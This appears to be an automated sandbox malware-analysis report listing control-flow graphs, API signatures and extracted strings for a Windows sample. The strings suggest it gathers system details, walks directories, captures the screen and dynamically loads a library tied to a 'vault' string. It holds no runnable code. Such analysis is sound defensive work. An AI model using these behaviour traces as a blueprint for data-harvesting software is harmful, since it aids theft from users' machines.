                                                                                                    control_flow_graph 0 7ff75a6f8330-7ff75a6f87cc call 7ff75a6f6540 call 7ff75a6f6460 call 7ff75a6f6860 call 7ff75a6f6150 call 7ff75a6f61f0 call 7ff75a6f8030 call 7ff75a6f5fc0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 GlobalMemoryStatusEx 63 7ff75a6f87d5-7ff75a6f87e6 0->63 64 7ff75a6f87ce-7ff75a6f87d3 0->64 65 7ff75a6f87ea-7ff75a6f8af1 call 7ff75a6b3ff0 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 63->65 64->65 96 7ff75a6f8af4-7ff75a6f8afc 65->96 96->96 97 7ff75a6f8afe-7ff75a6f8b6c call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6f5b70 96->97 106 7ff75a6f8b71-7ff75a6f8c6d call 7ff75a6b5310 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 97->106 107 7ff75a6f8b6e 97->107 116 7ff75a6f8c70-7ff75a6f8c78 106->116 107->106 116->116 117 7ff75a6f8c7a-7ff75a6f8cd7 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 116->117 124 7ff75a6f8d0b-7ff75a6f8d26 117->124 125 7ff75a6f8cd9-7ff75a6f8ceb 117->125 128 7ff75a6f8d59-7ff75a6f8edc call 7ff75a6f59a0 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 124->128 129 7ff75a6f8d28-7ff75a6f8d39 124->129 126 7ff75a6f8d06 call 7ff75a71e880 125->126 127 7ff75a6f8ced-7ff75a6f8d00 125->127 126->124 127->126 130 7ff75a6f9b0f-7ff75a6f9b14 call 7ff75a708254 127->130 152 7ff75a6f8ee0-7ff75a6f8ee8 128->152 132 7ff75a6f8d54 call 7ff75a71e880 129->132 133 7ff75a6f8d3b-7ff75a6f8d4e 129->133 136 7ff75a6f9b15-7ff75a6f9b1a call 7ff75a708254 130->136 132->128 133->132 133->136 145 7ff75a6f9b1b-7ff75a6f9b20 call 7ff75a708254 136->145 151 7ff75a6f9b21-7ff75a6f9b26 call 7ff75a708254 145->151 157 7ff75a6f9b27-7ff75a6f9b2c call 7ff75a708254 151->157 152->152 154 7ff75a6f8eea-7ff75a6f8f3d call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 152->154 169 7ff75a6f8f70-7ff75a6f8fcd call 7ff75a70840c call 7ff75a70948c call 7ff75a709898 154->169 170 7ff75a6f8f3f-7ff75a6f8f50 154->170 163 7ff75a6f9b2d-7ff75a6f9b32 call 7ff75a708254 157->163 168 7ff75a6f9b33-7ff75a6f9b38 call 7ff75a708254 163->168 178 7ff75a6f9b39-7ff75a6f9b3e call 7ff75a708254 168->178 187 7ff75a6f8fd0-7ff75a6f8fd8 169->187 173 7ff75a6f8f52-7ff75a6f8f65 170->173 174 7ff75a6f8f6b call 7ff75a71e880 170->174 173->145 173->174 174->169 184 7ff75a6f9b3f-7ff75a6f9b44 call 7ff75a708254 178->184 190 7ff75a6f9b45-7ff75a6f9b4a call 7ff75a708254 184->190 187->187 189 7ff75a6f8fda-7ff75a6f90dc call 7ff75a6b86b0 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 187->189 219 7ff75a6f910f-7ff75a6f9167 call 7ff75a731650 GetModuleFileNameA 189->219 220 7ff75a6f90de-7ff75a6f90ef 189->220 196 7ff75a6f9b4b-7ff75a6f9b50 call 7ff75a708254 190->196 202 7ff75a6f9b51-7ff75a6f9b56 call 7ff75a708254 196->202 208 7ff75a6f9b57-7ff75a6f9b5c call 7ff75a708254 202->208 214 7ff75a6f9b5d-7ff75a6f9b62 call 7ff75a708254 208->214 221 7ff75a6f9b63-7ff75a6f9b68 call 7ff75a708254 214->221 229 7ff75a6f9170-7ff75a6f9178 219->229 222 7ff75a6f90f1-7ff75a6f9104 220->222 223 7ff75a6f910a call 7ff75a71e880 220->223 222->151 222->223 223->219 229->229 230 7ff75a6f917a-7ff75a6f92a2 call 7ff75a6b86b0 call 7ff75a6b5310 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 229->230 241 7ff75a6f92a5-7ff75a6f92ad 230->241 241->241 242 7ff75a6f92af-7ff75a6f930d call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 241->242 249 7ff75a6f9340-7ff75a6f935b 242->249 250 7ff75a6f930f-7ff75a6f9320 242->250 253 7ff75a6f938f-7ff75a6f93b9 call 7ff75a6f76a0 249->253 254 7ff75a6f935d-7ff75a6f936f 249->254 251 7ff75a6f9322-7ff75a6f9335 250->251 252 7ff75a6f933b call 7ff75a71e880 250->252 251->157 251->252 252->249 261 7ff75a6f93be-7ff75a6f94ae call 7ff75a6b5310 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 253->261 262 7ff75a6f93bb 253->262 256 7ff75a6f9371-7ff75a6f9384 254->256 257 7ff75a6f938a call 7ff75a71e880 254->257 256->163 256->257 257->253 277 7ff75a6f94e4-7ff75a6f94fb 261->277 278 7ff75a6f94b0-7ff75a6f94c4 261->278 262->261 281 7ff75a6f952e-7ff75a6f964c call 7ff75a6b5310 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 277->281 282 7ff75a6f94fd-7ff75a6f950e 277->282 279 7ff75a6f94c6-7ff75a6f94d9 278->279 280 7ff75a6f94df call 7ff75a71e880 278->280 279->168 279->280 280->277 295 7ff75a6f9651-7ff75a6f9658 281->295 284 7ff75a6f9510-7ff75a6f9523 282->284 285 7ff75a6f9529 call 7ff75a71e880 282->285 284->178 284->285 285->281 295->295 296 7ff75a6f965a-7ff75a6f96b4 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 295->296 303 7ff75a6f96b6-7ff75a6f96ca 296->303 304 7ff75a6f96ea-7ff75a6f970a 296->304 305 7ff75a6f96e5 call 7ff75a71e880 303->305 306 7ff75a6f96cc-7ff75a6f96df 303->306 307 7ff75a6f97e2-7ff75a6f989e call 7ff75a6b37f0 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 304->307 308 7ff75a6f9710-7ff75a6f97dd call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 304->308 305->304 306->184 306->305 330 7ff75a6f98a3-7ff75a6f98bb call 7ff75a6b3ff0 307->330 308->330 333 7ff75a6f98ee-7ff75a6f9909 330->333 334 7ff75a6f98bd-7ff75a6f98ce 330->334 337 7ff75a6f993c-7ff75a6f9953 333->337 338 7ff75a6f990b-7ff75a6f991c 333->338 335 7ff75a6f98d0-7ff75a6f98e3 334->335 336 7ff75a6f98e9 call 7ff75a71e880 334->336 335->190 335->336 336->333 339 7ff75a6f9955-7ff75a6f9969 337->339 340 7ff75a6f9989-7ff75a6f99a3 337->340 342 7ff75a6f991e-7ff75a6f9931 338->342 343 7ff75a6f9937 call 7ff75a71e880 338->343 344 7ff75a6f9984 call 7ff75a71e880 339->344 345 7ff75a6f996b-7ff75a6f997e 339->345 346 7ff75a6f99a5-7ff75a6f99b9 340->346 347 7ff75a6f99d9-7ff75a6f99f3 340->347 342->196 342->343 343->337 344->340 345->202 345->344 350 7ff75a6f99d4 call 7ff75a71e880 346->350 351 7ff75a6f99bb-7ff75a6f99ce 346->351 352 7ff75a6f99f5-7ff75a6f9a09 347->352 353 7ff75a6f9a29-7ff75a6f9a43 347->353 350->347 351->208 351->350 357 7ff75a6f9a24 call 7ff75a71e880 352->357 358 7ff75a6f9a0b-7ff75a6f9a1e 352->358 354 7ff75a6f9a45-7ff75a6f9a59 353->354 355 7ff75a6f9a79-7ff75a6f9a93 353->355 359 7ff75a6f9a74 call 7ff75a71e880 354->359 360 7ff75a6f9a5b-7ff75a6f9a6e 354->360 361 7ff75a6f9ac5-7ff75a6f9b08 call 7ff75a71e860 355->361 362 7ff75a6f9a95-7ff75a6f9aa9 355->362 357->353 358->214 358->357 359->355 360->221 360->359 365 7ff75a6f9ac0 call 7ff75a71e880 362->365 366 7ff75a6f9aab-7ff75a6f9abe 362->366 365->361 366->365 368 7ff75a6f9b09-7ff75a6f9b0e call 7ff75a708254 366->368 368->130
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Name$DevicesDisplayEnum$ComputerFileGlobalMemoryModuleStatusUserValuewcsftime
                                                                                                    • String ID: %d-%m-%Y, %H:%M:%S$computer_name$cpu$gpu$ram$system$time$timezone$user_name
                                                                                                    • API String ID: 4122120932-1182675529
                                                                                                    • Opcode ID: 51e59fcf0f6f0fde0bd35e2d5984d4f3d7da06dca640c4e41ce2a64277dcc207
                                                                                                    • Instruction ID: bce3f85137be3804885dce6c716fa0ef7aaf7fa57b30ce44e8adf2902aa6e836
                                                                                                    • Opcode Fuzzy Hash: 51e59fcf0f6f0fde0bd35e2d5984d4f3d7da06dca640c4e41ce2a64277dcc207
                                                                                                    • Instruction Fuzzy Hash: 86E2A873A18BC695E721DF24D8902EDB7A1FB89788F445635EA8D07B99EF38D240C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                                                    • String ID: content$directory_iterator::directory_iterator$exists$filename$status
                                                                                                    • API String ID: 1254564140-3429737954
                                                                                                    • Opcode ID: 012e6ba9c2c8677ccf4bbf7714e3ab1c70571e04e8762841456c3c5d8b6df22a
                                                                                                    • Instruction ID: f79d0a656e34ff406984f76718d7dc48abc17419378dc16e3f7bd107ca63aebe
                                                                                                    • Opcode Fuzzy Hash: 012e6ba9c2c8677ccf4bbf7714e3ab1c70571e04e8762841456c3c5d8b6df22a
                                                                                                    • Instruction Fuzzy Hash: C0E27072A04BC589EB21EF34D8803EDB365FB85B58F945275EA5C0BA99DF78D680C310

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 800 7ff75a6d6350-7ff75a6d69ee call 7ff75a69d4e0 call 7ff75a69d370 808 7ff75a6d69f0-7ff75a6d69f7 800->808 808->808 809 7ff75a6d69f9-7ff75a6da9b7 call 7ff75a6c5c20 call 7ff75a69d810 call 7ff75a69eaf0 call 7ff75a69e240 call 7ff75a708254 * 3 call 7ff75a69e1d0 call 7ff75a708254 call 7ff75a6b39b0 call 7ff75a6b79f0 call 7ff75a6b7ac0 call 7ff75a720e88 call 7ff75a708254 * 2 call 7ff75a69cf70 call 7ff75a69e0c0 call 7ff75a69e1d0 call 7ff75a69e240 call 7ff75a708254 call 7ff75a69e1d0 * 2 call 7ff75a708254 call 7ff75a6b39b0 call 7ff75a6b79f0 call 7ff75a6b7ac0 call 7ff75a720e88 call 7ff75a708254 call 7ff75a69e0c0 call 7ff75a69cf70 call 7ff75a708254 call 7ff75a69e240 call 7ff75a708254 * 3 call 7ff75a69e1d0 call 7ff75a708254 call 7ff75a6b39b0 call 7ff75a6b79f0 call 7ff75a6b7ac0 call 7ff75a720e88 call 7ff75a708254 * 2 call 7ff75a69cf70 call 7ff75a69e0c0 call 7ff75a69e1d0 call 7ff75a69e240 call 7ff75a69e1d0 * 4 call 7ff75a69cf70 call 7ff75a69e1d0 * 3 call 7ff75a69cf70 call 7ff75a708254 * 3 call 7ff75a6f0040 call 7ff75a731650 GetModuleFileNameW 808->809 939 7ff75a6da9c0-7ff75a6da9c9 809->939 939->939 940 7ff75a6da9cb-7ff75a6dabde call 7ff75a6a6940 939->940 943 7ff75a6dabe1-7ff75a6dabea 940->943 943->943 944 7ff75a6dabec-7ff75a6dae7d call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 943->944 954 7ff75a6dae80-7ff75a6dae89 944->954 954->954 955 7ff75a6dae8b-7ff75a6db11e call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 954->955 965 7ff75a6db121-7ff75a6db12a 955->965 965->965 966 7ff75a6db12c-7ff75a6db600 call 7ff75a6a6940 call 7ff75a69d4a0 call 7ff75a6b5fd0 965->966 979 7ff75a6db603-7ff75a6db60c 966->979 979->979 980 7ff75a6db60e-7ff75a6db8bd call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 979->980 990 7ff75a6db8c0-7ff75a6db8c9 980->990 990->990 991 7ff75a6db8cb-7ff75a6dbb70 call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 990->991 1001 7ff75a6dbb73-7ff75a6dbb7c 991->1001 1001->1001 1002 7ff75a6dbb7e-7ff75a6dbd8b call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 1001->1002 1012 7ff75a6dbd90-7ff75a6dbd99 1002->1012 1012->1012 1013 7ff75a6dbd9b-7ff75a6dc0c7 call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 1012->1013 1023 7ff75a6dc0d0-7ff75a6dc0d8 1013->1023 1023->1023 1024 7ff75a6dc0da-7ff75a6dc326 call 7ff75a6a6940 call 7ff75a6a6bd0 call 7ff75a6b5fd0 call 7ff75a69cf70 call 7ff75a6d5d70 1023->1024
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __std_fs_convert_wide_to_narrow$__std_fs_code_page
                                                                                                    • String ID: cannot use push_back() with $directory_iterator::directory_iterator$exists$recursive_directory_iterator::operator++$recursive_directory_iterator::recursive_directory_iterator$status
                                                                                                    • API String ID: 3645842244-1862120484
                                                                                                    • Opcode ID: de5a621f2f067d1123de94e788919e3c44fbe91b6b887da37095cf4d544f4034
                                                                                                    • Instruction ID: ed1b2c2e271ef8c00a1604158e1e96eb54f13841c32f7ca4c6c3eaa2686225bc
                                                                                                    • Opcode Fuzzy Hash: de5a621f2f067d1123de94e788919e3c44fbe91b6b887da37095cf4d544f4034
                                                                                                    • Instruction Fuzzy Hash: CAD22772909BC985E6709B19F4812ABF3A1FBD8B84F405625EACC53B59EF7CD250CB04

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$DeleteMetricsSystem$CreateSelectStream_$CapsCompatibleCriticalDeviceReleaseSection$BitmapEnterLeaveReadResetSizeStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 3214587331-3916222277
                                                                                                    • Opcode ID: 312cd4efce3d3f241b15748fa518ee44aaca86f0cd571cabb29f5cbe721ad1f9
                                                                                                    • Instruction ID: 61f7eb0b8846b0c2c2b790f6bd86f91de982c337895fdddaaf0fa5e889bd900c
                                                                                                    • Opcode Fuzzy Hash: 312cd4efce3d3f241b15748fa518ee44aaca86f0cd571cabb29f5cbe721ad1f9
                                                                                                    • Instruction Fuzzy Hash: 55B16032A08BC186E760EF21E4543AAF7A2FF89B80F844575DA8D43B69DF7CD4458B50

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1078 7ff75a6ad570-7ff75a6ad66f LoadLibraryA 1079 7ff75a6ae530-7ff75a6ae53a 1078->1079 1080 7ff75a6ad675-7ff75a6ada30 GetProcAddress * 6 1078->1080 1081 7ff75a6ae549-7ff75a6ae54c 1079->1081 1082 7ff75a6ae53c-7ff75a6ae53e 1079->1082 1080->1079 1083 7ff75a6ada36-7ff75a6ada39 1080->1083 1084 7ff75a6ae557-7ff75a6ae586 call 7ff75a71e860 1081->1084 1085 7ff75a6ae54e-7ff75a6ae551 FreeLibrary 1081->1085 1082->1081 1083->1079 1086 7ff75a6ada3f-7ff75a6ada42 1083->1086 1085->1084 1086->1079 1089 7ff75a6ada48-7ff75a6ada4b 1086->1089 1089->1079 1091 7ff75a6ada51-7ff75a6ada54 1089->1091 1091->1079 1092 7ff75a6ada5a-7ff75a6ada5d 1091->1092 1092->1079 1093 7ff75a6ada63-7ff75a6ada71 1092->1093 1094 7ff75a6ada75-7ff75a6ada77 1093->1094 1094->1079 1095 7ff75a6ada7d-7ff75a6ada89 1094->1095 1095->1079 1096 7ff75a6ada8f-7ff75a6ada98 1095->1096 1097 7ff75a6adaa0-7ff75a6adabb 1096->1097 1099 7ff75a6adac1-7ff75a6adadf 1097->1099 1100 7ff75a6ae517-7ff75a6ae523 1097->1100 1099->1100 1103 7ff75a6adae5-7ff75a6adaf7 1099->1103 1100->1097 1101 7ff75a6ae529 1100->1101 1101->1079 1104 7ff75a6ae503-7ff75a6ae512 1103->1104 1105 7ff75a6adafd 1103->1105 1104->1100 1106 7ff75a6adb02-7ff75a6adb53 call 7ff75a71e888 1105->1106 1110 7ff75a6addd2 1106->1110 1111 7ff75a6adb59-7ff75a6adb60 1106->1111 1114 7ff75a6addd4-7ff75a6adddb 1110->1114 1111->1110 1113 7ff75a6adb66-7ff75a6adc5f call 7ff75a6e78f0 call 7ff75a6b5310 call 7ff75a6b55e0 1111->1113 1139 7ff75a6adc60-7ff75a6adc68 1113->1139 1116 7ff75a6ae051-7ff75a6ae08d 1114->1116 1117 7ff75a6adde1-7ff75a6adde8 1114->1117 1125 7ff75a6ae093-7ff75a6ae0a1 1116->1125 1126 7ff75a6ae327-7ff75a6ae329 1116->1126 1117->1116 1119 7ff75a6addee-7ff75a6adedb call 7ff75a6e78f0 call 7ff75a6b5310 call 7ff75a6b55e0 1117->1119 1151 7ff75a6adee2-7ff75a6adeea 1119->1151 1129 7ff75a6ae320-7ff75a6ae323 1125->1129 1130 7ff75a6ae0a7-7ff75a6ae0ae 1125->1130 1131 7ff75a6ae32f-7ff75a6ae458 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a71e888 call 7ff75a6d51b0 1126->1131 1132 7ff75a6ae4d5-7ff75a6ae4eb call 7ff75a6b00f0 1126->1132 1129->1126 1135 7ff75a6ae325 1129->1135 1130->1129 1137 7ff75a6ae0b4-7ff75a6ae1a8 call 7ff75a6e78f0 call 7ff75a6b5310 call 7ff75a6b55e0 1130->1137 1225 7ff75a6ae464-7ff75a6ae477 call 7ff75a6b37f0 1131->1225 1226 7ff75a6ae45a-7ff75a6ae45c 1131->1226 1146 7ff75a6ae4f1-7ff75a6ae4fc 1132->1146 1147 7ff75a6adb00 1132->1147 1135->1126 1166 7ff75a6ae1b0-7ff75a6ae1b7 1137->1166 1139->1139 1144 7ff75a6adc6a-7ff75a6adcc4 call 7ff75a6b86b0 call 7ff75a6b6bc0 call 7ff75a6b3ff0 1139->1144 1174 7ff75a6adcc6-7ff75a6adcd7 1144->1174 1175 7ff75a6adcf7-7ff75a6add21 1144->1175 1146->1104 1147->1106 1151->1151 1156 7ff75a6adeec-7ff75a6adf45 call 7ff75a6b86b0 call 7ff75a6b6bc0 call 7ff75a6b3ff0 1151->1156 1188 7ff75a6adf47-7ff75a6adf58 1156->1188 1189 7ff75a6adf78-7ff75a6adfa2 1156->1189 1166->1166 1171 7ff75a6ae1b9-7ff75a6ae212 call 7ff75a6b86b0 call 7ff75a6b6bc0 call 7ff75a6b3ff0 1166->1171 1236 7ff75a6ae245-7ff75a6ae26e 1171->1236 1237 7ff75a6ae214-7ff75a6ae225 1171->1237 1179 7ff75a6adcf2 call 7ff75a71e880 1174->1179 1180 7ff75a6adcd9-7ff75a6adcec 1174->1180 1183 7ff75a6add23-7ff75a6add37 1175->1183 1184 7ff75a6add59-7ff75a6add7f 1175->1184 1179->1175 1180->1179 1186 7ff75a6ae5e1-7ff75a6ae5e6 call 7ff75a708254 1180->1186 1191 7ff75a6add52-7ff75a6add57 call 7ff75a71e880 1183->1191 1192 7ff75a6add39-7ff75a6add4c 1183->1192 1194 7ff75a6add81-7ff75a6add95 1184->1194 1195 7ff75a6addb7-7ff75a6addd0 1184->1195 1199 7ff75a6ae5e7-7ff75a6ae5ec call 7ff75a708254 1186->1199 1196 7ff75a6adf73 call 7ff75a71e880 1188->1196 1197 7ff75a6adf5a-7ff75a6adf6d 1188->1197 1200 7ff75a6adfa4-7ff75a6adfb8 1189->1200 1201 7ff75a6adfda-7ff75a6ae000 1189->1201 1191->1184 1192->1191 1192->1199 1205 7ff75a6addb0-7ff75a6addb5 call 7ff75a71e880 1194->1205 1206 7ff75a6add97-7ff75a6addaa 1194->1206 1195->1114 1196->1189 1197->1196 1207 7ff75a6ae5f3-7ff75a6ae5f8 call 7ff75a708254 1197->1207 1215 7ff75a6ae5ed-7ff75a6ae5f2 call 7ff75a708254 1199->1215 1210 7ff75a6adfd3-7ff75a6adfd8 call 7ff75a71e880 1200->1210 1211 7ff75a6adfba-7ff75a6adfcd 1200->1211 1217 7ff75a6ae002-7ff75a6ae016 1201->1217 1218 7ff75a6ae038-7ff75a6ae04a 1201->1218 1205->1195 1206->1205 1206->1215 1224 7ff75a6ae5f9-7ff75a6ae5fe call 7ff75a708254 1207->1224 1210->1201 1211->1210 1211->1224 1215->1207 1228 7ff75a6ae031-7ff75a6ae036 call 7ff75a71e880 1217->1228 1229 7ff75a6ae018-7ff75a6ae02b 1217->1229 1218->1116 1231 7ff75a6ae5ff-7ff75a6ae604 call 7ff75a708254 1224->1231 1247 7ff75a6ae47b-7ff75a6ae487 1225->1247 1238 7ff75a6ae462 1226->1238 1239 7ff75a6ae58d-7ff75a6ae5da call 7ff75a6b39b0 call 7ff75a6b79f0 call 7ff75a6b7ac0 call 7ff75a720e88 1226->1239 1228->1218 1229->1228 1229->1231 1257 7ff75a6ae605-7ff75a6ae60a call 7ff75a708254 1231->1257 1248 7ff75a6ae270-7ff75a6ae284 1236->1248 1249 7ff75a6ae2a4-7ff75a6ae2ca 1236->1249 1244 7ff75a6ae240 call 7ff75a71e880 1237->1244 1245 7ff75a6ae227-7ff75a6ae23a 1237->1245 1238->1247 1272 7ff75a6ae5db-7ff75a6ae5e0 call 7ff75a708254 1239->1272 1244->1236 1245->1244 1245->1257 1252 7ff75a6ae489-7ff75a6ae4ac 1247->1252 1253 7ff75a6ae4ae-7ff75a6ae4b8 call 7ff75a6c0610 1247->1253 1260 7ff75a6ae29f call 7ff75a71e880 1248->1260 1261 7ff75a6ae286-7ff75a6ae299 1248->1261 1255 7ff75a6ae300-7ff75a6ae319 1249->1255 1256 7ff75a6ae2cc-7ff75a6ae2e0 1249->1256 1263 7ff75a6ae4bd-7ff75a6ae4ce call 7ff75a6b3ff0 1252->1263 1253->1263 1255->1129 1266 7ff75a6ae2e2-7ff75a6ae2f5 1256->1266 1267 7ff75a6ae2fb call 7ff75a71e880 1256->1267 1260->1249 1261->1260 1269 7ff75a6ae587-7ff75a6ae58c call 7ff75a708254 1261->1269 1263->1132 1266->1267 1266->1272 1267->1255 1269->1239 1272->1186
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$Library$FreeLoad
                                                                                                    • String ID: cannot use push_back() with $system$vault
                                                                                                    • API String ID: 2463004387-1741236777
                                                                                                    • Opcode ID: 0873a3fb5bbb520a30d261d12c2612c28bb7750a3105e5d7ddf57a5f45584eca
                                                                                                    • Instruction ID: 73d7efa4ae0e0f5d852110cc39863609203a6f49da7d3efae4dcdabb8ef7a963
